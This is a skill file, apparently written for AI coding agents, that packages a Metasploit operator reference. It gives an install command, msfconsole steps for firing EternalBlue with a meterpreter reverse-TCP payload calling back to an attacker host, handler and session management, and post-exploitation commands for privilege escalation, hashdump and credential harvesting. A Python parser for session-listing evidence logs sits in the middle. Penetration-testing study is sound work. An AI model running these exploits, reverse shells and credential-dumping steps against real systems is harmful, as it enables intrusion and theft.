offensive-tools/exploits/metasploit/SKILL.md
Auth/lab ref: Metasploit module reference; search/config/check, handler/session lab, msfconsole/msfvenom syntax, evidence capture.
Install this skill globally with one command (works with Claude Code, Cursor, and Windsurf):

```bash
npx skillsauth add aeondave/malskill metasploit
```
Exploit framework — find, configure, and fire exploits; manage sessions; automate post-exploitation.
```bash
# Start console (with DB)
msfdb init && msfconsole
# Start quiet
msfconsole -q
msf6 > search type:exploit name:eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > info
msf6 exploit(...) > show options
msf6 exploit(...) > set RHOSTS 10.10.10.10
msf6 exploit(...) > set LHOST 10.10.14.5
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run
```
```bash
search type:exploit platform:windows name:smb
search cve:2021-44228                  # Log4Shell
search type:auxiliary name:scanner     # Auxiliary scanners
search rank:excellent platform:linux   # Only excellent-ranked
```
| Type | Prefix | Use |
|------|--------|-----|
| exploit | exploit/ | Run exploit against target |
| auxiliary | auxiliary/ | Scanners, fuzzers, brute-force |
| post | post/ | Post-exploitation on session |
| payload | payload/ | Shellcode / stager |
| encoder | encoder/ | Payload obfuscation |
| nop | nop/ | NOP sleds |
```bash
info                # Module details, options, references
show options        # Required/optional params
show payloads       # Compatible payloads for this module
show targets        # Supported target OS variants
set OPTION VALUE    # Set option
setg OPTION VALUE   # Set globally (persists across modules)
unset OPTION        # Clear option
check               # Test if target is vulnerable (if supported)
run / exploit       # Fire
run -j              # Run as background job
jobs                # List running jobs
kill <id>           # Kill a job
```
```bash
# Staged (small stager, pulls stage over network — needs handler)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Stageless (self-contained — works without handler running)
set PAYLOAD windows/x64/meterpreter_reverse_tcp

# Common payloads
windows/x64/meterpreter/reverse_tcp   # Windows staged
windows/x64/shell_reverse_tcp         # Windows raw shell
linux/x64/meterpreter/reverse_tcp     # Linux staged
linux/x64/shell/reverse_tcp           # Linux shell
python/meterpreter/reverse_tcp        # Python target
```
```bash
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run -j              # Background — catches incoming connections
```
```bash
sessions -l         # List sessions
sessions -i 1       # Interact with session 1
sessions -u 1       # Upgrade shell to meterpreter
sessions -k 1       # Kill session
background          # Background current session (Ctrl+Z)
```
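For the evidence-capture side of a lab, the `sessions -l` listing is what records which handler caught which host and when. The following is an added example (not part of this skill or of Metasploit) that parses a constructed `sessions -l` listing into timestamped JSON-lines records; the column layout it assumes (Id, Name, Type, Information, Connection) is the usual msfconsole format, and the sample rows are constructed.

```python
import json
import re
from dataclasses import asdict, dataclass
from datetime import datetime, timezone

# One row of `sessions -l`. The Name column is often blank, so it is optional.
# Assumed layout: Id  Name  Type <platform>  Information  LHOST:LPORT -> RHOST:RPORT (target)
SESSION_ROW = re.compile(
    r"^\s*(?P<id>\d+)\s+(?:(?P<name>\S+)\s+)?"
    r"(?P<type>meterpreter|shell)\s+(?P<platform>\S+)\s+"
    r"(?P<info>.*?)\s+"
    r"(?P<lhost>\S+):(?P<lport>\d+)\s+->\s+(?P<rhost>\S+):(?P<rport>\d+)"
    r"(?:\s+\((?P<target>[^)]+)\))?\s*$"
)

# Constructed sample listing, in the shape msfconsole prints.
SAMPLE_LISTING = """\
Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  NT AUTHORITY\\SYSTEM @ WIN01  10.10.14.5:4444 -> 10.10.10.10:49213 (10.10.10.10)
  2         shell x64/linux          lab shell                    10.10.14.5:4445 -> 10.10.10.11:51022 (10.10.10.11)
"""

@dataclass
class SessionRecord:
    session_id: int
    session_type: str
    platform: str
    info: str
    handler: str      # LHOST:LPORT of the listener that caught the session
    peer: str         # RHOST:RPORT the inbound connection came from
    target: str
    captured_at: str  # UTC ISO timestamp of when the listing was taken

def parse_sessions(listing: str, captured_at: datetime) -> list[SessionRecord]:
    """Turn a `sessions -l` listing into evidence records; header/separator lines are skipped."""
    records = []
    for line in listing.splitlines():
        m = SESSION_ROW.match(line)
        if not m:
            continue
        records.append(SessionRecord(
            session_id=int(m["id"]), session_type=m["type"], platform=m["platform"],
            info=m["info"].strip(), handler=f"{m['lhost']}:{m['lport']}",
            peer=f"{m['rhost']}:{m['rport']}", target=m["target"] or m["rhost"],
            captured_at=captured_at.astimezone(timezone.utc).isoformat(),
        ))
    return records

def to_jsonl(records: list[SessionRecord]) -> str:
    """One JSON object per line, ready to append to the engagement evidence log."""
    return "\n".join(json.dumps(asdict(r), sort_keys=True) for r in records)
```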
```bash
sysinfo             # System info
getuid              # Current user
getsystem           # Attempt privilege escalation
getpid              # Process ID
ps                  # Process list
migrate <PID>       # Migrate to another process
shell               # Drop to OS shell
upload file /path/  # Upload file
download /path/file # Download file
ls / pwd / cd       # Filesystem navigation
hashdump            # Dump SAM hashes (needs SYSTEM)
run post/multi/recon/local_exploit_suggester   # Find privesc
```
```bash
db_nmap -sV -p- 10.10.10.10   # Nmap scan + store results
hosts               # Show discovered hosts
services            # Show discovered services
vulns               # Show flagged vulnerabilities
creds               # Show captured credentials
```
| File | When to load |
|------|--------------|
| references/msfvenom.md | Payload generation with msfvenom, encoders, formats |
| references/post-exploitation.md | Post modules, pivoting, credential extraction |